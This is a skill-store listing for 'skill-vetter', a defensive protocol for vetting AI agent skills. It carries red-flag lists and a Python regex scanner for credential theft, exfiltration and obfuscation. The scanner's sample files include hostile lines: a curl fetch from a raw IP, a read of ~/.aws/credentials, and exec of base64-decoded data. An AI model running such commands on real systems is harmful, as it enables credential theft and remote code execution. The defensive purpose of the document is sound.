TopRank Skills


skill-vetter

Security vetting protocol before installing any AI agent skill. Red flag detection for credential theft, obfuscated code, exfiltration. Risk classification LOW/MEDIUM/HIGH/EXTREME. Produces structured vetting reports. Never install untrusted skills without running this first.

Stars: 0
Installs: 0
Status: ACTIVE
Visibility: PUBLIC

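Installation

Copy the prompt below and send it to your AI assistant to complete the installation.

First check whether the SkillHub store is installed. If it is not, install the SkillHub store by following https://skillhub-1388575217.cos.ap-guangzhou.myqcloud.com/install/skillhub.md, then install the skill-vetter skill. If it is already installed, install the skill-vetter skill directly.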

Overview

Skill Key: donovanpankratz-del/openclaw-skill-vetter
Author: donovanpankratz-del
Source Repo: openclaw/skills
Version: 1.0.0
Source Path: skills/donovanpankratz-del/openclaw-skill-vetter
Latest Commit SHA: 3289ef080a59eebcf5362c1c9d68758b5eacbd92

Extracted Content

SKILL.md excerpt

# Skill Vetter 🔒

Security-first vetting protocol for AI agent skills. **Never install a skill without vetting it first.**

## Problem Solved

Installing untrusted skills is dangerous:
- Malicious code can steal credentials
- Skills can exfiltrate data to external servers
- Obfuscated scripts can run arbitrary commands
- Typosquatted names can trick you into installing fakes

This skill provides a systematic vetting process before installation.

## When to Use

- **Before installing any skill from ClawHub**
- **Before running skills from GitHub repos**
- **When evaluating skills shared by other agents**
- **Anytime you're asked to install unknown code**

## Vetting Protocol

### Step 1: Source Check

Answer these questions:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?

### Step 2: Code Review (MANDATORY)

Read **ALL** files in the skill. Check for these **RED FLAGS**:

```
🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────
```
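
One way to pre-screen a skill's files for a subset of the red flags above before the mandatory manual read. This is an added example, not part of skill-vetter's own code; the regexes, the 500-character line threshold and the sample files are assumptions constructed here.

```python
import re
from pathlib import Path

# Illustrative regexes (assumptions) for a subset of the Step 2 red flags.
# A hit marks a line for the reviewer; no hit does not mean the skill is safe.
RED_FLAGS = {
    "curl/wget to URL": re.compile(r"\b(?:curl|wget)\b.*https?://"),
    "network call to raw IP": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?![\w.])"),
    "reads ~/.ssh, ~/.aws or ~/.config": re.compile(r"(?:~|\$HOME)/\.(?:ssh|aws|config)\b"),
    "agent memory/identity file": re.compile(r"\b(?:MEMORY|USER|SOUL|IDENTITY)\.md\b"),
    "base64 decode": re.compile(r"base64\s+(?:-d|--decode)\b|b64decode|\batob\s*\("),
    "eval()/exec()": re.compile(r"\b(?:eval|exec)\s*\("),
    "sudo": re.compile(r"\bsudo\s"),
}
MAX_LINE = 500  # assumed threshold: longer lines suggest minified/packed code


def scan_text(name, text):
    """Return a list of (file, line_no, flag) for every red-flag hit."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        hits += [(name, no, flag) for flag, rx in RED_FLAGS.items() if rx.search(line)]
        if len(line) > MAX_LINE:
            hits.append((name, no, "possible obfuscated/minified line"))
    return hits


def scan_skill(root):
    """Scan every file under root; undecodable bytes are replaced, not skipped."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            text = path.read_text(encoding="utf-8", errors="replace")
            hits += scan_text(str(path.relative_to(root)), text)
    return hits


# Constructed sample files (not from any real skill); 203.0.113.7 is a
# documentation-range address.
SAMPLE = {
    "install.sh": "curl -s http://203.0.113.7/setup.sh -o setup.sh\ncat ~/.aws/credentials\n",
    "run.py": 'import base64\nexec(base64.b64decode(blob))\nprint("done")\n',
    "notes.md": "Summarises the workspace README.\n",
}

if __name__ == "__main__":
    for fname, body in SAMPLE.items():
        for hit in scan_text(fname, body):
            print(hit)
```

Flags that depend on judgement ("unknown" URLs, access "without clear reason") still need the reviewer to confirm each hit against the skill's stated purpose.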

### Step 3: Permission Scope

Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?

**Principle of Least Privilege:*...

README excerpt

# Skill Vetter - Installation

Security-first vetting protocol for AI agent skills.

## Quick Install

```bash
# Via ClawHub (when published)
clawhub install skill-vetter

# Or manual
cd ~/.openclaw/workspace/skills
# Download from ClawHub or extract package
```

## Usage

Before installing **any** skill:

```
You: "Vet the deep-research-pro skill from ClawHub"
Agent: [Downloads to temp dir, reviews code, checks for red flags]
Agent: [Produces vetting report with risk level and verdict]
```

## What It Checks

- ✅ Source reputation (downloads, stars, author)
- ✅ Code review (red flag detection)
- ✅ Permission scope (files, network, commands)
- ✅ Risk classification (LOW/MEDIUM/HIGH/EXTREME)

## Red Flags (Auto-Reject)

- curl/wget to unknown URLs
- Credential/API key theft attempts
- Obfuscated code (base64, minified)
- sudo/root access requests
- Network calls to IP addresses
- Access to ~/.ssh, ~/.aws, etc.

## Vetting Report Example

```
SKILL VETTING REPORT
═══════════════════════════════════════
Skill: example-skill
Source: ClawHub
RED FLAGS: None
PERMISSIONS: Read/write workspace only
RISK LEVEL: 🟢 LOW
VERDICT: ✅ SAFE TO INSTALL
═══════════════════════════════════════
```

## Integration

**Works with:**
- **zero-trust-protocol:** Enforces verification flow
- **drift-guard:** Logs vetting decisions

## Requirements

- `curl` (for GitHub API checks)
- `jq` (for JSON parsing)

## License

MIT - Free to use, modify, distribute.

---

**Never install untrusted code. Vet first.**
